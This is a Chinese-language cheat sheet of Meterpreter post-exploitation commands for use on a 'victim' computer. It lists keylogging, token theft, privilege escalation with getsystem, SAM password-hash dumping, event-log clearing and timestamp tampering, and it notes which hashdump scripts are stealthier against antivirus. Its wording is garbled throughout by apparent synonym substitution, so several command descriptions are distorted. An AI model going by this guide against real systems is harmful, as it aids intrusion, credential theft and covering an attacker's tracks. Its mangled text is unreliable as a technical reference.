第1步:核心呼吁
在其最根基的使用,meterpreter 是一个 Linux 终端在受害者的计较机上。如许,咱们的良多根基的Linux呼吁能够用在meterpreter甚至是在一个窗口或其他操作琐屑。
这里有一些核心的呼吁能够用在meterpreter。
? – 扶助菜单
background – 将当前会话移动到背景
bgkill – 杀死一个背景 meterpreter 脚本
bglist – 供给所有正在运行的背景脚本的列表
bgrun – 作为一个背景线程运行脚本
channel – 透露表现活动频道
close – 关闭通道
exit – 终止 meterpreter 会话
help – 扶助菜单
interact – 与通道中止交互
irb – 进入 Ruby 脚本模式
migrate – 移动到一个指定的 PID 的活动进程
quit – 终止 meterpreter 会话
read – 从通道读取数据
run – 实验当前它选定的 meterpreter 脚本
use – 加载 meterpreter 的裁减
write – 将数据写入到一个通道
第2步:文件琐屑呼吁
cat -读取并输出到标准输出文件的内容
cd -厘革目次对受害人
del -删除文件对受害人
download-从受害者琐屑文件下载
edit-用 vim编辑文件
getlwd -打印本地目次
getwd -打印工作目次
lcd -厘革本地目次
lpwd -打印本地目次
ls -列出在当前目次中的文件列表
mkdir -在受害者琐屑上的建立目次
pwd -输出工作目次
rm -删除文件
rmdir -受害者琐屑上删除目次
upload-从打击者的琐屑往受害者琐屑上传文件
第 三 步: 网络呼吁
ipconfig -透露表现网络接口的要害消息,收罗 IP 地址、 等。
portfwd -端口转发
route -检查或批改受害者路由表
第 4 步: 琐屑呼吁
clearav -铲除了受害者的计较机上的事件日记
drop_token -被盗的令牌
execute-实验呼吁
getpid -获取当进步程 ID (PID)
getprivs -尽或者获取尽或者多的特权
getuid -获取作为运行服务器的用户
kill -终止指定 PID 的进程
ps -列出正在运行的进程
reboot-重新创议受害人的计较机
reg -与受害人的注册表中止交互
rev2self -在受害者机器上调用 RevertToSelf()
shell -在受害者计较机上翻开一个shell
shutdown-关闭了受害者的计较机
steal_token -试图盗取指定的 (PID) 进程的令牌
sysinfo -获取无关受害者计较机操作琐屑和称号等的具体消息
第 5 步: 用户界面呼吁
enumdesktops -列出所有可拜访台式机
getdesktop -获取当前的 meterpreter 桌面
idletime -检查长工夫以来,受害者琐屑闲暇进程
keyscan_dump -键盘记录软件的内容转储
keyscan_start -创议时与如 Word 或浏览器的进程相干联的键盘记录软件
keyscan_stop -中止键盘记录软件
screenshot-抓去 meterpreter 桌面的屏幕截图
set_desktop -厘革 meterpreter 桌面
uictl -启用用户界面组件的一些控件
第 6 步: 特权降级呼吁
getsystem -失掉琐屑方案员权限
第 7 步: 密码转储呼吁
hashdump -抓去哈希密码 (SAM) 文件中的值
请留神 hashdump 会能够跳过杀毒软件,但而今有两个脚本,都更加潜伏,”run hashdump”和”run smart_hashdump”。查找更多关于那些在我即将举行的 meterpreter 脚本作弊。
第 8 步: Timestomp 呼吁
timestomp -操作批改,拜访,并建立一个文件的属性
